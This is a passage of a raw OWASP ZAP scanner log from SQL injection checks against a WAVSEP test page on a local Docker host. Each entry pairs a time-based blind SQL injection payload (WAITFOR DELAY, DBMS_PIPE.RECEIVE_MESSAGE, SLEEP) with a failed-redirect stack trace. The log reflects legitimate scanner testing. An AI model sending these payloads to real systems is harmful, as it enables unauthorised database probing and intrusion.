CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688289 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688290 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(78)||CHR(104)||CHR(86),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(78)||CHR(104)||CHR(86),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688292 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(105)||CHR(67)||CHR(76),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(105)||CHR(67)||CHR(76),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688292 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(87)||CHR(82)||CHR(100),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(87)||CHR(82)||CHR(100),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688293 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(67)||CHR(97)||CHR(115),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(67)||CHR(97)||CHR(115),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688295 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(88)||CHR(78)||CHR(75)||CHR(77),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(88)||CHR(78)||CHR(75)||CHR(77),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688296 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(89)||CHR(73)||CHR(68),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(89)||CHR(73)||CHR(68),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688297 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND (SELECT * FROM (SELECT(SLEEP(5)))QBBQ) AND (1594=1594] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) AND (SELECT * FROM (SELECT(SLEEP(5)))QBBQ) AND (1594=1594 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688297 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))QCnU)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))QCnU) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688298 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND (SELECT * FROM (SELECT(SLEEP(5)))zzBN) AND ('hHaP'='hHaP] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') AND (SELECT * FROM (SELECT(SLEEP(5)))zzBN) AND ('hHaP'='hHaP at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688299 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND (SELECT * FROM (SELECT(SLEEP(5)))xbEC) AND 'Qkhj'='Qkhj] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' AND (SELECT * FROM (SELECT(SLEEP(5)))xbEC) AND 'Qkhj'='Qkhj at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688300 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND (SELECT * FROM (SELECT(SLEEP(5)))SmvB) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' AND (SELECT * FROM (SELECT(SLEEP(5)))SmvB) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688301 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))tHjH)-- yMfQ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))tHjH)-- yMfQ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at 